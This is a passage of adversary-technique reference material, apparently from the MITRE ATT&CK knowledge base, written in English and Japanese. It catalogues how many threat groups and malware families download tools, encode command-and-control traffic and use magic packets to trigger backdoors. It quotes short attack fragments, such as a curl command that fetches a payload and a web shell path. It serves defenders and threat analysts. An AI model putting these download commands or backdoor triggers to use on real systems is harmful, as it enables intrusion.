scripts, tools, and malware onto victim systems. APT41 used certutil to download additional files. APT41 downloaded post-exploitation tools such as Cobalt Strike via command shell following initial access. APT41 has uploaded Procdump and NATBypass to a staging directory and has used these tools in follow-on activities. APT-C-36 has downloaded binary data from a specified domain after the malicious document is opened. Wizard Spider can transfer malicious payloads such as ransomware to compromised machines. Rocke used malware to download additional malicious files to the target system. Whitefly has the ability to download additional tools from the C2. Windshift has used tools to deploy additional payloads to compromised hosts. Chimera has remotely copied tools and malware onto targeted systems. Fox Kitten has downloaded additional tools including PsExec directly to endpoints. Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host. Evilnum can deploy additional components or tools as needed. Sidewinder has used LNK files to download remote files to the victim's network. Volatile Cedar can deploy additional tools. HAFNIUM has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host. TA551 has retrieved DLLs and installer binaries for malware execution from C2. ZIRCONIUM has used tools to download malicious files to compromised hosts. Mustang Panda has downloaded additional executables following the initial infection stage. Mustang Panda has also leveraged Visual Studio Code `code.exe` and Dev Tunnels using `DevTunnel.exe` to propagate additional tools and payloads. Ajax Security Team has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system. Tonto Team has downloaded malicious DLLs which served as a ShadowPad loader. Nomadic Octopus has used malicious macros to download additional files to the victim's machine. BackdoorDiplomacy has downloaded additional files and tools onto a compromised host. IndigoZebra has downloaded additional files and tools from its C2 server. Andariel has downloaded additional tools and malware onto compromised hosts. TeamTNT has the <code>curl</code> and <code>wget</code> commands as well as batch scripts to download new tools. LazyScripter had downloaded additional tools to a compromised host. Confucius has downloaded additional files and payloads onto a compromised host following initial access. Aquatic Panda has downloaded additional malware onto compromised hosts. HEXANE has downloaded additional payloads and malicious scripts onto a compromised host. BITTER has downloaded additional malware and tools onto a compromised host. SideCopy has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers to download malicious payloads. Moses Staff has downloaded and installed web shells to following path <code>C:\inetpub\wwwroot\aspnet_client\system_web\IISpool.aspx</code>. Metador has downloaded tools and malware onto a compromised system. LuminousMoth has downloaded additional malware and tools onto a compromised host. Scattered Spider has downloaded the Teleport remote access tool to compromised VMware vCenter Servers. FIN13 has downloaded additional tools and malware to compromised systems. Volt Typhoon has downloaded an outdated version of comsvcs.dll to a compromised domain controller in a non-standard folder. TA2541 has used malicious scripts and macros with the ability to download additional payloads. Mustard Tempest has deployed secondary payloads and third stage implants to compromised hosts. Cinnamon Tempest has downloaded files, including Cobalt Strike, to compromised hosts. INC Ransom has downloaded tools to compromised servers including Advanced IP Scanner. Daggerfly has used PowerShell and BITSAdmin to retrieve follow-on payloads from external locations for execution on victim machines. Winter Vivern executed PowerShell scripts to create scheduled tasks to retrieve remotely-hosted payloads. Moonstone Sleet retrieved a final stage payload from command and control infrastructure during initial installation on victim systems. Play has used Cobalt Strike to download files to compromised machines. BlackByte has transferred tools such as Cobalt Strike to victim environments from file sharing and hosting websites. Storm-1811 has used scripted `cURL` commands, BITSAdmin, and other mechanisms to retrieve follow-on batch scripts and tools for execution on victim devices. Medusa Group has leveraged certutil, PowerShell, and Windows Command to download additional tools to include RMM services. Medusa Group has also engaged in “Bring Your Own Vulnerable Driver” (BYOVD) and downloaded vulnerable or signed drivers to the victim environment to disable security tools. VOID MANTICORE has deployed additional payloads from dedicated C2 servers. VOID MANTICORE has also downloaded legitimate tools and software from publicly available services. VOID MANTICORE had utilized VeraCrypt a legitimate disk encrypting utility that was downloaded directly from the website. Hikit has the ability to download files to a compromised host. Taidoor has downloaded additional files onto a compromised host. PoisonIvy creates a backdoor through which remote attackers can upload files. PlugX has a module to download and execute files on the compromised machine. Ixeshe can download and execute additional files. BISCUIT has a command to download a file from the C2 server. China Chopper's server component can download remote files. Uroburos can use a `Put` command to write files to an infected machine. CHOPSTICK is capable of performing remote file transmission. Dyre has a command to download and executes additional files. gh0st RAT can download files to the victim’s machine. LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware. JHUHUGIT can retrieve an additional payload from its C2 server. JHUHUGIT has a command to download files to the victim’s machine. MiniDuke can download additional encrypted backdoors onto the victim via GIF files. SeaDuke is capable of uploading and downloading files. CloudDuke downloads and executes additional malware from either a Web address or a Microsoft OneDrive account. RARSTONE downloads its backdoor component from a C2 server and loads it directly into memory. HTTPBrowser is capable of writing a file to the compromised system from the C2 server. Sakula has the capability to download files. CallMe has the capability to download a file to the victim from the C2 server. Psylo has a command to download a file to the system from its C2 server. MobileOrder has a command to download a file from the C2 server to the victim mobile device's SD card. Mivast has the capability to download and execute .exe files. Elise can download additional files from the C2 server for execution. Emissary has the capability to download files from the C2 server. Misdat is capable of downloading files from the C2. Mis-Type has downloaded additional malware and files onto a compromised host. S-Type can download additional files onto a compromised host. ZLib has the ability to download files. Hi-Zor has the ability to upload and download files from its C2 server. Kasidet has the ability to download and execute additional files. Agent.btz attempts to download an encrypted binary from a specified domain. Backdoor.Oldrea can download additional modules from C2. Trojan.Karagany can upload, download, and execute files on the victim. ftp may be abused by adversaries to transfer tools or files from an external system into a compromised environment. cmd can be used to copy files to/from a remotely connected external system. WEBC2 can download and execute a file. Crimson contains a command to retrieve files from its C2 server. Nidiran can download and execute files. Pisloader has a command to upload a file to the victim machine. Remsec contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS. BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself. Unknown Logger is capable of downloading remote files. H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests. After downloading its main config file, Downdelph downloads multiple payloads from C2 servers. CORESHELL downloads another dropper from its C2 server. PowerDuke has a command to download a file. Shamoon can download an executable to run on the victim. The Winnti for Windows dropper can place malicious payloads on targeted systems. ChChes is capable of downloading files, including additional modules. POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims. Pteranodon can download and execute additional files. RTM can download additional files. POSHSPY downloads and executes additional PowerShell code and Windows binaries. RedLeaves is capable of downloading a file from a specified URL. Cobalt Strike can deliver additional payloads to victim machines. certutil can be used to download files from a given URL. TDTESS has a command to download and execute an additional file. RemoteCMD copies a file over to the remote system before execution. Gazer can execute a task to download a file. Helminth can download additional files. Felismus can download files from remote servers. Volgmer can download remote files and additional payloads to the victim's machine. POWRUNER can download or upload files from its C2 server. SEASHARPEE can download remote files onto victims. Daserf can download remote files. BITSAdmin can be used to create BITS Jobs to upload and/or download files. Pupy can upload and download to/from a victim machine. PUNCHBUGGY can download additional files and payloads to compromised hosts. NETWIRE can downloaded payloads from C2 to the compromised host. TURNEDUP is capable of downloading additional files. Dipsind can download remote files. JPIN can download files and upgrade itself. Hydraq creates a backdoor through which remote attackers can download files and additional malware components. Briba downloads files onto infected hosts. Wiarp creates a backdoor through which remote attackers can download files. Vasport can download files. Pasam creates a backdoor through which remote attackers can upload files. Nerex creates a backdoor through which remote attackers can download files onto a compromised host. Linfo creates a backdoor through which remote attackers can download files onto compromised hosts. DOGCALL can download and execute additional payloads. can download and execute a second-stage payload. KARAE can upload and download files, including second-stage malware. SHUTTERSPEED can download and execute an arbitary executable. SLOWDRIFT downloads additional payloads. POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server. Smoke Loader downloads a new version of itself once it has installed. It also downloads additional plugins. NanHaiShu can download additional files from URLs. Orz can download files onto the victim. ZeroT can download additional payloads onto the victim. Bandook can download files to the system. Kwampirs downloads additional files from C2 servers. Bankshot uploads files and secondary payloads to the victim's machine. ROKRAT can retrieve additional malicious payloads from its C2 server. RATANKBA uploads and downloads information. NavRAT can download files remotely. Gold Dragon can download additional components from the C2 server. Koadic can download additional files and tools. Zebrocy obtains additional code to execute on the victim's machine, including the downloading of a secondary payload. PLAINTEE has downloaded and executed additional plugins. DDKONG downloads and uploads files on the victim’s machine. Mosquito can upload and download files to the victim. VERMIN can download and upload files to the victim's machine. RGDoor uploads and downloads files to and from the victim’s machine. InvisiMole can upload files to the victim's machine for operations. QuasarRAT can download files to the victim’s machine and execute them. TYPEFRAME can upload and download files to the victim’s machine. OopsIE can download files from its C2 server to the victim's machine. Kazuar downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary. TrickBot downloads several additional files and saves them to the victim's machine. FELIXROOT downloads and uploads files to and from the victim’s machine. Bisonal has the capability to download files to execute on the victim’s machine. RogueRobin can save a new file to the system from the C2 server. KEYMARBLE can upload files to the victim’s machine and can download additional payloads. NDiskMonitor can download and execute a file from given URL. Calisto has the capability to upload and download files to the victim's machine. UPPERCUT can download and upload files to and from the victim’s machine. jRAT can download and execute files. More_eggs can download and launch additional payloads. Zeus Panda can download additional malware plug-in modules and execute them on the victim’s machine. Agent Tesla can download additional files for execution on the victim’s machine. Remcos can upload and download files to and from the victim’s machine. UBoatRAT can upload and download files to the victim’s machine. DarkComet can load any files onto the infected machine to execute. NanoCore has the capability to download and activate additional modules for execution. BadPatch can download and execute or update malware. Micropsia can download and execute an executable from the C2 server. Octopus can download additional files and tools onto the victim’s machine. Xbash can download additional malicious files from its C2 server. GreyEnergy can download additional modules and payloads. Azorult can download and execute additional files. Azorult has also downloaded a ransomware payload called Hermes. Seasalt has a command to download additional files. AuditCred can download files and additional malware. Cardinal RAT can download and execute additional payloads. Cannon can download a payload for execution. OSX_OCEANLOTUS.D has a command to download and execute a file on the victim’s machine. NOKKI has downloaded a remote module for execution. Denis deploys additional backdoors and hacking tools to the system. KONNI can download files and execute them on the victim’s machine. BONDUPDATER can download or upload files from its C2 server. Empire can upload and download to and from a victim machine. Emotet can download follow-on payloads and items via malicious `url` parameters in obfuscated PowerShell code. CoinTicker executes a Python script to download its second stage. Astaroth uses certutil and BITSAdmin to download additional malware. SpeakUp downloads and executes additional files from a remote server. HOPLIGHT has the ability to connect to a remote host in order to upload and download files. Revenge RAT has the ability to upload and download files. StoneDrill has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine. FlawedAmmyy can transfer files from C2. ServHelper may download additional files to execute. njRAT can download files to the victim’s machine. APT-C-36 has used modified versions of njRAT to enable the download of .NET assemblies. Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads. KeyBoy has a download and upload functionality. YAHOYAH uses HTTP GET requests to download other files that are executed in memory. SQLRat can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk. HiddenWasp downloads a tar compressed archive from a download server to the system. LightNeuron has the ability to download and execute additional files. EvilBunny has downloaded additional Lua scripts from the C2. HyperBro has the ability to download additional files. Exaramel for Linux has a command to download a file from and to a remote C2 server. OSX/Shlayer can download payloads, and extract bytes from files. OSX/Shlayer uses the <code>curl -fsL "$url" >$tmp_path</code> command to download malicious payloads into a temporary directory. esentutl can be used to copy files from a given URL. Machete can download additional files for execution on the victim’s machine. ZxShell has a command to transfer files from a remote host. BabyShark has downloaded additional files from the C2. PoetRAT has the ability to copy files and download/upload files into C2 channels using FTP and HTTPS. Winnti for Linux has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host. HotCroissant has the ability to upload a file from the command and control (C2) server to the victim machine. PLEAD has the ability to upload and download files to and from an infected host. TSCookie has the ability to upload and download files to and from the infected host. Kivars has the ability to download and execute files. Attor can download additional plugins, updates and other files. Okrum has built-in commands for uploading, downloading, and executing files to the system. VBShower has the ability to download VBS files to the target computer. ShimRat can download additional files. ShimRatReporter had the ability to download additional payloads. Lokibot downloaded several staged items onto the victim's machine. SHARPSTATS has the ability to upload and download files. LoudMiner used SCP to update the miner from the C2. Pony can download additional files onto the infected system. Metamorfo has used MSI files to download additional files to execute. Aria-body has the ability to download additional payloads from C2. Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload. MechaFlounder has the ability to upload and download files to and from a compromised host. SDBbot has the ability to download a DLL from C2 to a compromised host. CARROTBAT has the ability to download and execute a remote file via certutil. CARROTBALL has the ability to download and install a remote payload. Skidmap has the ability to download files on an infected host. ABK has the ability to download files from C2. BBK has the ability to download files from C2 to the infected host. build_downer has the ability to download files from C2 to the infected host. down_new has the ability to download files to the compromised host. Avenger has the ability to download files from C2 to a compromised host. BackConfig can download and execute additional payloads on a compromised host. Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and NetSupport Manager RAT-based malware. Bundlore can download and execute new versions of itself. IcedID has the ability to download additional modules and a configuration file from C2. Carberp can download and execute new plugins from the C2 server. Bonadan can download additional modules from the C2 server. Kessel can download additional modules from the C2 server. StrongPity can download files to specified targets. CookieMiner can download additional scripts from a web server. GoldenSpy constantly attempts to download and execute files from the remote C2, including GoldenSpy itself if not found on the system. RDAT can download files via DNS. REvil can download a copy of itself from an attacker controlled IP address to the victim machine. Dacls can download its payload from a C2 server. Cryptoistic has the ability to send and receive files. Hancitor has the ability to download additional files from C2. MCMD can upload additional files to a compromised host. PipeMon can install additional modules via C2 commands. Drovorub can download files to a compromised host. Anchor can download additional payloads. RegDuke can download files from C2. LiteDuke has the ability to download files. WellMess can write files to a compromised host. WellMail can receive data and executable scripts from C2. SoreFang can download additional payloads from C2. PolyglotDuke can retrieve payloads from the C2 server. BLINDINGCAN has downloaded files to a victim machine. KGH_SPY has the ability to download and execute code from remote servers. CSPY Downloader can download additional tools to a compromised host. Javali can download payloads from remote C2 servers. Melcoz has the ability to download additional files to a compromised host. Grandoreiro can download its second stage from a hardcoded URL within the loader's code. Lucifer can download and execute a replica of itself using certutil. SLOTHFULMEDIA has downloaded files onto a victim machine. Bazar can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike. SharpStage has the ability to download and execute additional payloads via a DropBox API. DropBook can download and execute additional files. MoleNet can download additional payloads from the C2. Egregor has the ability to download files from its C2 server. SUNBURST delivered different payloads, including TEARDROP in at least one instance. GuLoader can download further malware for execution on the victim's machine. BlackMould has the ability to download files to the victim's machine. Dtrack’s can download and upload a file to the victim’s computer. EVILNUM can download and upload files to the victim's computer. Explosive has a function to download a file to the infected system. Caterpillar WebShell has a module to download and upload files to the system. BendyBear is designed to download an implant from a C2 server. Waterbear can receive and load executables from remote C2 servers. Kerrdown can download specific payloads to a compromised host based on OS architecture. TAINTEDSCRIBE can download additional modules from its C2 server. Penquin can execute the command code <code>do_download</code> to retrieve remote files from C2. GoldMax can download and execute additional files. Sibot can download and execute a payload onto a compromised system. RemoteUtilities can upload and download files to and from a target machine. ThiefQuest can download and execute payloads in-memory or from disk. ShadowPad has downloaded code from a C2 server. P.A.S. Webshell can upload and download files to and from compromised hosts. Kinsing has downloaded additional lateral movement scripts from C2. Doki has downloaded scripts from C2. Hildegard has downloaded additional scripts that build and run Monero cryptocurrency miners. Industroyer downloads a shellcode payload from a remote C2 server and loads it into memory. Conficker downloads an HTTP server to the infected machine. SideTwist has the ability to download additional files. CostaBricks can download additional payloads onto a compromised host. CostaBricks has been used to load SombRAT onto a compromised host. SombRAT has the ability to download and execute additional payloads. DEATHRANSOM can download files to a compromised host. Ecipekac can download additional payloads to a compromised host. Cuba can download files from its C2 server. P8RAT can download additional payloads to a target system. SodaMaster has the ability to download additional payloads from C2 to the targeted system. FYAnti can download additional payloads to a compromised host. RainyDay can download files to a compromised host. Nebulae can download files from C2. Chaes can download additional files onto an infected machine. GrimAgent has the ability to download and execute additional payloads. Sliver can download additional content and files from the Sliver server to the client residing on the victim machine using the <code>upload</code> command. BoomBox has the ability to download next stage malware components to a compromised system. VaporRage has the ability to download malicious shellcode to compromised systems. Seth-Locker has the ability to download and execute files on a compromised host. BADFLICK has download files from its C2 server. Peppy can download and execute remote files. SpicyOmelette can download malicious files from threat actor controlled AWS URL's. Turian can download additional files and tools from its C2. JSS Loader has the ability to download malicious executables to a compromised host. SMOKEDHAM has used Powershell to download UltraVNC and ngrok from third-party file sharing sites. QakBot has the ability to download additional components and malware. BoxCaon can download files. MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin. xCaon has a command to download files to the victim's machine. BLUELIGHT can download additional files onto the host. XCSSET downloads browser specific AppleScript modules using a constructed URL with the <code>curl</code> command, <code>https://" & domain & "/agent/scripts/" & moduleName & ".applescript</code>. Diavol can receive configuration updates and additional payloads including wscpy.exe from C2. FoggyWeb can receive additional malicious components from an actor controlled C2 server and execute them on a compromised AD FS server. RCSession has the ability to drop additional files to an infected machine. SysUpdate has the ability to download files to a compromised host. Pandora can load additional drivers and files onto a victim machine. ThreatNeedle can download additional tools to enable lateral movement. Gelsemium can download additional plug-ins to a compromised host. Chrommme can download its code from C2. TinyTurla has the ability to act as a second-stage dropper used to infect the system with additional malware. KOCTOPUS has executed a PowerShell command to download a file to the system. WarzoneRAT can download and execute additional files. Tomiris can download files and execute them on a victim's system. Zox can download files to a compromised machine. CharmPower has the ability to download additional modules to a compromised host. LitePower has the ability to download payloads containing system commands to a compromised host. Lizar can download additional plugins, files, and tools. PowerPunch can download payloads from adversary infrastructure. QuietSieve can download and execute payloads on a target host. Cyclops Blink has the ability to download files to target systems. Meteor has the ability to download additional files for execution on the victim's machine. WhisperGate can download additional stages of malware from a Discord CDN channel. Neoichor can download additional files onto a compromised host. SILENTTRINITY can load additional files and tools, including Mimikatz. DRATzarus can deploy additional tools onto an infected machine. Donut can download and execute previously staged shellcode payloads. Flagpro can download additional malware from the C2 server. PowerLess can download additional payloads to a compromised host. ZxxZ can download and execute additional files. DanBot can download additional files to a targeted system. Milan has received files from C2 and stored them in log folders beginning with the character sequence `a9850d2f`. MacMa has downloaded additional files, including an exploit for used privilege escalation. OutSteel can download files from its C2 server. Saint Bot can download additional files onto a compromised host. Shark can download additional files from its C2 via HTTP or DNS. Kevin can download files to the compromised host. DnsSystem can download files to compromised systems after receiving a command with the string `downloaddd`. CreepyDrive can download files to the compromised host. Amadey can download and execute files to further infect a host machine with additional malware. Mongall can download files to targeted systems. Action RAT has the ability to download additional payloads onto an infected machine. Squirrelwaffle has downloaded and executed additional encoded payloads. StrifeWater can download updates and auxiliary modules. Small Sieve has the ability to download files. Bumblebee can download and execute additional payloads including through the use of a `Dex` command. FunnyDream can download additional files onto a compromised host. macOS.OSAMiner has used `curl` to download a Stripped Payloads from a public facing adversary-controlled webpage. metaMain can download files onto compromised systems. Mafalda can download additional files onto the compromised host. Brute Ratel C4 can download files to compromised hosts. SVCReady has the ability to download additional tools such as the RedLine Stealer to an infected host. Woody RAT can download files from its C2 server, including the .NET DLLs, `WoodySharpExecutor` and `WoodyPowerSession`. DarkTortilla can download additional packages for keylogging, cryptocurrency mining, and other capabilities; it can also retrieve malicious payloads such as Agent Tesla, AsyncRat, NanoCore, RedLine, Cobalt Strike, and Metasploit. ANDROMEDA can download additional payloads from C2. BADHATCH has the ability to load a second stage malicious DLL file onto a compromised machine. Sardonic has the ability to upload additional malicious files to a compromised machine. Snip3 can download additional payloads to compromised systems. AsyncRAT has the ability to download files including over SFTP. Disco can download files to targeted systems via SMB. SharpDisco has been used to download a Python interpreter to `C:\Users\Public\WinTN\WinTN.exe` as well as other plugins from external sources. NightClub can load multiple additional plugins on an infected host. Samurai has been used to deploy other malware including Ninja. RAPIDPULSE can transfer files to and from compromised hosts. DarkGate retrieves cryptocurrency mining payloads and commands in encrypted traffic from its command and control server. DarkGate uses Windows Batch scripts executing the <code>curl</code> command to retrieve follow-on payloads. DarkGate has stolen `sitemanager.xml` and `recentservers.xml` from `%APPDATA%\FileZilla\` if present. STEADYPULSE can add lines to a Perl script on a targeted server to import additional Perl modules. ZIPLINE can download files to be saved on the compromised system. WIREFIRE has the ability to download files to compromised devices. BUSHWALK can write malicious payloads sent through a web request’s command parameter. SocGholish can download additional malware to infected hosts. Raspberry Robin retrieves its second stage payload in a variety of ways such as through msiexec.exe abuse, or running the curl command to download the payload to the victim's <code>%AppData%</code> folder. Gootloader can fetch second stage code from hardcoded web domains. Spica can upload and download files to and from compromised hosts. Raccoon Stealer downloads various library files enabling interaction with various data stores and structures to facilitate follow-on information theft. CHIMNEYSWEEP can download additional files from C2. IMAPLoader is a loader used to retrieve follow-on payload encoded in email messages for execution on victim systems. DUSTTRAP can retrieve and load additional payloads. Latrodectus can download and execute PEs, DLLs, and shellcode from C2. Solar has the ability to download and execute files. SampleCheck5000 can download additional payloads to compromised hosts. ODAgent has the ability to download and execute files on compromised systems. OilCheck can download staged payloads from an actor-controlled infrastructure. OilBooster can download and execute files from an actor-controlled OneDrive account. PowerExchange can decode Base64-encoded files and call `WriteAllBytes` to write the files to compromised hosts. MagicRAT can import and execute additional payloads. StrelaStealer installers have used obfuscated PowerShell scripts to retrieve follow-on payloads from WebDAV servers. On macOS, LightSpy downloads a `.json` file from the C2 server. The `.json` file contains metadata about the plugins to be downloaded, including their URL, name, version, and MD5 hash. LightSpy retrieves the plugins specified in the `.json` file, which are compiled `.dylib` files. These `.dylib` files provide task and platform specific functionality. LightSpy also imports open-source libraries to manage socket connections. reGeorg has the ability to download files to targeted systems. Neo-reGeorg has the ability to download files to targeted systems. NICECURL has the ability to download additional content onto an infected machine, e.g. by using `curl`. TAMECAT has used `wget` and `curl` to download additional content. Hannotog can download additional files to the victim machine. VIRTUALPITA has the ability to upload and download files. RIFLESPINE can download and execute files. CASTLETAP can transfer files to compromised network devices. PUBLOAD has acted as a stager that can download the next-stage payload from its C2 server. PUBLOAD has also delivered FDMTP as a secondary control tool and PTSOCKET for exfiltration to some infected systems. Havoc has the ability to upload files to infected systems. TONESHELL has the ability to download additional files to the victim device. RedLine Stealer has the ability download additional payloads. InvisibleFerret has downloaded “AnyDesk.exe” into the user’s home directory from the C2 server when checks for the service fail to identify its presence in the victim environment. InvisibleFerret has also been configured to download additional payloads using a command which calls to the /bow URI. BeaverTail has been used to download a malicious payload to include Python based malware InvisibleFerret. XORIndex Loader has been used to download a malicious payload to include BeaverTail. HexEval Loader has been used to download a malicious payload to include BeaverTail. SystemBC has downloaded additional files for execution on the victim’s machine. The server component of SystemBC has the ability to send additional files to victim machines. HTTPTroy has the ability to download files from C2 using the `down <FILENAME>` command. Shai-Hulud has downloaded packages from code repositories. Shai-Hulud has also downloaded and executed the secrets-discovery tool TruffleHog to gather sensitive data. GlassWorm has downloaded additional payloads from C2. PHASEJAM has the ability to upload files onto the compromised appliance. BRICKSTORM has the ability to download files from the Adversaries C2 server to the compromised system. Caminho has the ability to download files onto compromised hosts. PureCrypter can download additional payloads for execution on the compromised host. LODEINFO has the ability to download additional files from the C2. DOWNIISSA can download files to the compromised host. HiddenFace can download files from the C2 to victim systems. PHPsert has the ability to retrieve remote payloads. The AshTag stager component can retrieve and execute the main payload. MuddyViper has the ability to download files from the C2 server. Additionally, MuddyViper has the ability to download a file in chunks with sleep time between each chunk. Tsundere Botnet’s loader component has downloaded the zip file node-v18.17.0-win-x64.zip from the official Node.js website, as well as pm2, a Node.js process management tool. 敵対者は、C2通信のデータを標準/非標準方式でエンコードすることがある。 Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems. Some data encoding systems may also result in data compression, such as gzip. 敵対者は、Base64等の標準方式でC2データをエンコードすることがある。Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME. Some data encoding systems may also result in data compression, such as gzip. 敵対者は、独自方式でC2データをエンコードすることがある。Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request. ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 データエンコーディングに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Velvet Ant sent commands to compromised F5 BIG-IP devices in an encoded format requiring a passkey before interpretation and execution. After encrypting C2 data, BADNEWS converts it into a hexadecimal representation and then encodes it into base64. H1N1 obfuscates C2 traffic with an altered version of base64. Linux Rabbit sends the payload from the C2 server as an encoded URL parameter. Ursnif has used encoded data in HTTP URLs for C2. Mythic provides various transform functions to encode and/or randomize C2 data. evilginx2 can randomly generate and Base64 encode parameters in phishing links to defeat static detection. LAMEHUG can encode queries sent to LLMs. 敵対者は、特定のパケット列（ポートノッキング等）を合図にバックドアを起動することがある。 Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. Port Knocking), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. 敵対者は、特定ポートへの接続列を合図にバックドアを起動することがある。Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. 敵対者は、ソケットフィルタを用いて特定パケットを合図に動作することがある。Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell. ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 トラフィックシグナリングに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Cutting Edge, threat actors sent a magic 48-byte sequence to enable the PITSOCK backdoor to communicate via the `/tmp/clientsDownload.sock` socket. During RedPenguin, UNC3886 leveraged malware capable of inpecting packets for a magic-string to activate backdoor functionalities. Kimsuky has used TRANSLATEXT to redirect clients to legitimate Gmail, Naver or Kakao pages if the clients connect with no parameters. Mustang Panda has utilized a magic value in C2 communications and only executes in memory when response packets match specific values of “17 03 03” or “46 77 4d”. UNC3886 has used the TABLEFLIP traffic redirection utility to listen for specialized command packets on compromised FortiManager devices. Uroburos can intercept the first client to server packet in the 3-way TCP handshake to determine if the packet contains the correct unique value for a specific Uroburos implant. If the value does not match, the packet and the rest of the TCP session are passed to the legitimate listening application. Chaos provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port. Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet. Winnti for Linux has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism. Ryuk has used Wake-on-Lan to power on turned off systems for lateral movement. SYNful Knock can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages. Penquin will connect to C2 only after sniffing a "magic packet" value in TCP or UDP packets matching specific conditions. Kobalos is triggered by an incoming TCP connection to a legitimate service from a specific source port. Pandora can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command. ZIPLINE can identify a specific string in intercepted network traffic, `SSH-2.0-OpenSSH_0.3xx.`, to trigger its command functionality. BUSHWALK can modify the `DSUserAgentCap.pm` Perl module on Ivanti Connect Secure VPNs and either activate or deactivate depending on the value of the user agent in incoming HTTP requests. TRANSLATEXT has redirected clients to legitimate Gmail, Naver or Kakao pages if the clients connect with no parameters. J-magic can monitor TCP traffic for packets containing one of five different predefined parameters and will spawn a reverse shell if one of the parameters and the proper response string to a subsequent challenge is received. The REPTILE reverse shell component can listen for a specialized packet in TCP, UDP, or ICMP for activation. PUBLOAD has utilized a magic value in C2 communications and only executes in memory when response packets match specific values of 17 03 03. PUBLOAD has also used magic bytes consisting of 46 77 4d. TONESHELL has utilized a magic value in C2 communications and only executes in memory when response packets match specific values. BRUSHFIRE has monitored inbound VPN traffic to compromised appliances until specific inbound packets contain a specific magic string/pattern instead of external beaconing. 敵対者は、正規のリモートアクセスツールを悪用してC2を確立することがある。 An adversary may use legitimate remote access tools to establish an interactive command and control channel within a network. Remote access tools create a session between two trusted hosts through a graphical interface, a command line interaction, a protocol tunnel via development or management software, or hardware-level access such as KVM (Keyboard, Video, Mouse) over IP solutions. Desktop support software (usually graphical interface) and remote management software (typically command line interface) allow a user to control a computer remotely as if they are a local user inheriting the user or software permissions. This software is commonly used for troubleshooting, software installation, and system management. Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access. 敵対者は、IDEのトンネリング機能を悪用してリモートアクセスすることがある。Adversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a network. IDE tunneling combines SSH, port forwarding, file sharing, and debugging into a single secure connection, letting developers work on remote systems as if they were local. Unlike SSH and port forwarding, IDE tunneling encapsulates an entire session and may use proprietary tunneling protocols alongside SSH, allowing adversaries to blend in with legitimate development workflows. Some IDEs, like Visual Studio Code, also provide CLI tools (e.g., `code tunnel`) that adversaries may use to programmatically establish tunnels and generate web-accessible URLs for remote access. These tunnels can be authenticated through accounts such as GitHub, enabling the adversary to control the compromised system via a legitimate developer portal. 敵対者は、正規のリモートデスクトップソフトを悪用することがある。An adversary may use legitimate desktop support software to establish an interactive command and control channel to target systems within networks. Desktop support software provides a graphical interface for remotely controlling another computer, transmitting the display output, keyboard input, and mouse control between devices using various protocols. Desktop support software, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, 